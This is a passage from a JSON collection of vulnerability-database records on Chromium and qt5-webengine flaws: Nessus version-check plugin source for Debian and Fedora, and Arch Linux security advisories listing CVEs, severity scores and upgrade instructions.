value:\"https://security-tracker.debian.org/tracker/CVE-2020-6389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6395\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6409\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6411\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6414\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4638\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the oldstable distribution (stretch), security support for\nchromium has been discontinued.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 80.0.3987.132-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:26", "description": "Update to 73.0.3683.75. 
Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757 CVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762 CVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767 CVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772 CVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777 CVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784 CVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790 CVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795 CVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800 CVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-02T00:00:00", "type": "nessus", "title": "Fedora 30 : chromium (2019-05a780936d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784", "CVE-2019-5786", "CVE-2019-5787", "CVE-2019-5788", "CVE-2019-5789", "CVE-2019-5790", "CVE-2019-5791", "CVE-2019-5792", "CVE-2019-5793", "CVE-2019-5794", "CVE-2019-5795", "CVE-2019-5796", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5799", "CVE-2019-5800", "CVE-2019-5801", "CVE-2019-5802", "CVE-2019-5803", 
"CVE-2019-5804"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-05A780936D.NASL", "href": "https://www.tenable.com/plugins/nessus/124466", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-05a780936d.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124466);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5784\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5801\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\");\n script_xref(name:\"FEDORA\", value:\"2019-05a780936d\");\n\n script_name(english:\"Fedora 30 : chromium (2019-05a780936d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 73.0.3683.75. 
Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-05a780936d\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5789\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
browser.\n\n- CVE-2017-5079 (content spoofing)\n\nA UI spoofing flaw has been found in the Blink component of the\nChromium browser.\n\n- CVE-2017-5083 (content spoofing)\n\nA UI spoofing flaw has been found in the Blink component of the\nChromium browser.\n\n- CVE-2017-5088 (information disclosure)\n\nAn out-of-bounds read vulnerability has been found in the V8 component\nof the Chromium browser < 59.0.3071.104.\n\n- CVE-2017-5089 (content spoofing)\n\nA domain spoofing vulnerability has been found in the Omnibox component\nof the Chromium browser < 59.0.3071.104.\n\nImpact\n======\n\nA remote attacker can access sensitive information, spoof content and\nexecute arbitrary code and commands on the affected host.\n\nReferences\n==========\n\nhttps://github.com/qt/qtwebengine/blob/5.9.1/dist/changes-5.9.1\nhttps://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=722756\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=715582\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=678776\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=719199\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=716311\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=711020\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=713686\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=714849\nhttps://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop_15.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=729991\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=714196\nhttps://security.archlinux.org/CVE-2017-5070\nhttps://security.archlinux.org/CVE-2017-5071\nhttps://security.archlinux.org/CVE-2017-5075\nhttps://security.archlinux.org/CVE-2017-5076\nhttps://security.archlinux.org/CVE-2017-5077\nhttps://security.archlinux.org/CVE-2017-5078\nhttps://security.archlinux.org/CVE-2017-5079\nhttps://security.archlinux.org/CVE-2017-5083\nhttps://security.arch
linux.org/CVE-2017-5088\nhttps://security.archlinux.org/CVE-2017-5089", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-04T00:00:00", "type": "archlinux", "title": "[ASA-201707-4] qt5-webengine: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5083", "CVE-2017-5088", "CVE-2017-5089"], "modified": "2017-07-04T00:00:00", "id": "ASA-201707-4", "href": "https://security.archlinux.org/ASA-201707-4", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T21:47:06", "description": "Arch Linux Security Advisory ASA-201706-8\n=========================================\n\nSeverity: Critical\nDate : 2017-06-07\nCVE-ID : CVE-2017-5070 CVE-2017-5071 CVE-2017-5072 CVE-2017-5073\nCVE-2017-5074 CVE-2017-5075 CVE-2017-5076 CVE-2017-5077\nCVE-2017-5078 CVE-2017-5079 CVE-2017-5080 CVE-2017-5081\nCVE-2017-5082 CVE-2017-5083 CVE-2017-5085 CVE-2017-5086\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : 
https://security.archlinux.org/AVG-289\n\nSummary\n=======\n\nThe package chromium before version 59.0.3071.86-1 is vulnerable to\nmultiple issues including arbitrary code execution, arbitrary command\nexecution, authentication bypass, content spoofing, information\ndisclosure, cross-site scripting and insufficient validation.\n\nResolution\n==========\n\nUpgrade to 59.0.3071.86-1.\n\n# pacman -Syu \"chromium>=59.0.3071.86-1\"\n\nThe problems have been fixed upstream in version 59.0.3071.86.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-5070 (arbitrary code execution)\n\nA type confusion flaw has been found in the V8 component of the\nChromium browser.\n\n- CVE-2017-5071 (information disclosure)\n\nAn out of bounds read flaw has been found in the V8 component of the\nChromium browser.\n\n- CVE-2017-5072 (content spoofing)\n\nAn address spoofing flaw has been found in the Omnibox component of the\nChromium browser.\n\n- CVE-2017-5073 (arbitrary code execution)\n\nA use-after-free flaw has been found in the print preview component of\nthe Chromium browser.\n\n- CVE-2017-5074 (arbitrary code execution)\n\nA use-after-free flaw has been found in the Apps Bluetooth component of\nthe Chromium browser.\n\n- CVE-2017-5075 (information disclosure)\n\nAn information leak flaw has been found in the CSP reporting component\nof the Chromium browser.\n\n- CVE-2017-5076 (content spoofing)\n\nAn address spoofing flaw has been found in the Omnibox component of the\nChromium browser.\n\n- CVE-2017-5077 (arbitrary code execution)\n\nA heap buffer overflow flaw was found in the Skia component of the\nChromium browser.\n\n- CVE-2017-5078 (arbitrary command execution)\n\nA possible command injection flaw has been found in the mailto handling\ncomponent of the Chromium browser.\n\n- CVE-2017-5079 (content spoofing)\n\nA UI spoofing flaw has been found in the Blink component of the\nChromium browser.\n\n- CVE-2017-5080 (arbitrary code execution)\n\nA 
use-after-free flaw has been found in the credit card autofill\ncomponent of the Chromium browser.\n\n- CVE-2017-5081 (authentication bypass)\n\nA extension verification bypass has been found in the Chromium browser.\n\n- CVE-2017-5082 (insufficient validation)\n\nAn insufficient hardening flaw has been found in the credit card editor\ncomponent of the Chromium browser.\n\n- CVE-2017-5083 (content spoofing)\n\nA UI spoofing flaw has been found in the Blink component of the\nChromium browser.\n\n- CVE-2017-5085 (cross-site scripting)\n\nA security issue has been found in the Chromium browser, where\njavascript is inappropriately executed on WebUI pages\n\n- CVE-2017-5086 (content spoofing)\n\nAn address spoofing flaw has been found in the Omnibox component of the\nChromium browser.\n\nImpact\n======\n\nA remote attacker can access sensitive information, spoof content,\nbypass security measures and execute arbitrary code and commands on the\naffected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=722756\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=715582\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=709417\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=716474\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=700040\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=678776\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=719199\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=716311\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=711020\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=713686\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=708819\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=672008\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=721579\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=714849\nhttps://bugs.chromium.org/p/chromium/issues/deta
il?id=692378\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=722639\nhttps://security.archlinux.org/CVE-2017-5070\nhttps://security.archlinux.org/CVE-2017-5071\nhttps://security.archlinux.org/CVE-2017-5072\nhttps://security.archlinux.org/CVE-2017-5073\nhttps://security.archlinux.org/CVE-2017-5074\nhttps://security.archlinux.org/CVE-2017-5075\nhttps://security.archlinux.org/CVE-2017-5076\nhttps://security.archlinux.org/CVE-2017-5077\nhttps://security.archlinux.org/CVE-2017-5078\nhttps://security.archlinux.org/CVE-2017-5079\nhttps://security.archlinux.org/CVE-2017-5080\nhttps://security.archlinux.org/CVE-2017-5081\nhttps://security.archlinux.org/CVE-2017-5082\nhttps://security.archlinux.org/CVE-2017-5083\nhttps://security.archlinux.org/CVE-2017-5085\nhttps://security.archlinux.org/CVE-2017-5086", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-07T00:00:00", "type": "archlinux", "title": "[ASA-201706-8] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", 
"CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2017-06-07T00:00:00", "id": "ASA-201706-8", "href": "https://security.archlinux.org/ASA-201706-8", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T16:34:04", "description": "Arch Linux Security Advisory ASA-201902-3\n=========================================\n\nSeverity: Critical\nDate : 2019-02-11\nCVE-ID : CVE-2019-5754 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761\nCVE-2019-5762 CVE-2019-5763 CVE-2019-5764 CVE-2019-5765\nCVE-2019-5766 CVE-2019-5767 CVE-2019-5768 CVE-2019-5769\nCVE-2019-5770 CVE-2019-5771 CVE-2019-5772 CVE-2019-5773\nCVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781\nCVE-2019-5782 CVE-2019-5783\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-861\n\nSummary\n=======\n\nThe package chromium before version 72.0.3626.81-1 is vulnerable to\nmultiple issues including arbitrary code execution, access restriction\nbypass, content spoofing and insufficient validation.\n\nResolution\n==========\n\nUpgrade to 72.0.3626.81-1.\n\n# pacman -Syu \"chromium>=72.0.3626.81-1\"\n\nThe problems have been fixed upstream in version 72.0.3626.81.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-5754 (arbitrary code execution)\n\nA security issue has been found in the QUIC implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5755 (arbitrary code execution)\n\nA security issue has been found in the V8 implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5756 (arbitrary code execution)\n\nA use after free issue has been found in the PDFium component of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5757 (arbitrary code execution)\n\nA 
type confusion issue has been found in the SVG implementation in the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5758 (arbitrary code execution)\n\nA use after free issue has been found in the blink component of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5759 (arbitrary code execution)\n\nA use after free issue has been found in the HTML select elements\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5760 (arbitrary code execution)\n\nA use after free issue has been found in the WebRTC implementation in\nthe chromium browser before 72.0.3626.81.\n\n- CVE-2019-5761 (arbitrary code execution)\n\nA use after free issue has been found in the SwiftShader component of\nthe chromium browser before 72.0.3626.81.\n\n- CVE-2019-5762 (arbitrary code execution)\n\nA use after free issue has been found in the PDFium component of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5763 (arbitrary code execution)\n\nA security issue has been found in the V8 implementation of the\nchromium browser before 72.0.3626.81.\n\n- CVE-2019-5764 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the WebRTC component\nof the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5765 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the chromium\nbrowser before 72.0.3626.81.\n\n- CVE-2019-5766 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the Canvas\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5767 (content spoofing)\n\nAn incorrect security UI issue has been found in the WebAPKs component\nof the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5768 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the DevTools\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5769 (insufficient validation)\n\nAn insufficient validation of untrusted input issue 
has been found in\nthe Blink component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5770 (arbitrary code execution)\n\nA heap-based buffer overflow vulnerability has been found in the WebGL\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5771 (arbitrary code execution)\n\nA heap-based buffer overflow vulnerability has been found in the\nSwiftShader component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5772 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the PDFium component\nof the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5773 (insufficient validation)\n\nAn insufficient data validation issue has been found in the IndexedDB\ncomponent of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5774 (insufficient validation)\n\nAn insufficient validation of untrusted input issue has been found in\nthe SafeBrowsing component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5775 (content spoofing)\n\nAn insufficient policy enforcement issue has been found in the OmniBox\ncomponent of the chromium browser before 72.0.3626.81, allowing IDN URL\nspoofing.\n\n- CVE-2019-5776 (content spoofing)\n\nAn insufficient policy enforcement issue has been found in the OmniBox\ncomponent of the chromium browser before 72.0.3626.81, allowing IDN URL\nspoofing.\n\n- CVE-2019-5777 (content spoofing)\n\nAn insufficient policy enforcement issue has been found in the OmniBox\ncomponent of the chromium browser before 72.0.3626.81, allowing IDN URL\nspoofing.\n\n- CVE-2019-5778 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the\nExtensions component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5779 (access restriction bypass)\n\nAn insufficient policy enforcement issue has been found in the\nServiceWorker component of the chromium browser before 72.0.3626.81.\n\n- CVE-2019-5780 (access restriction bypass)\n\nA security issue has been 
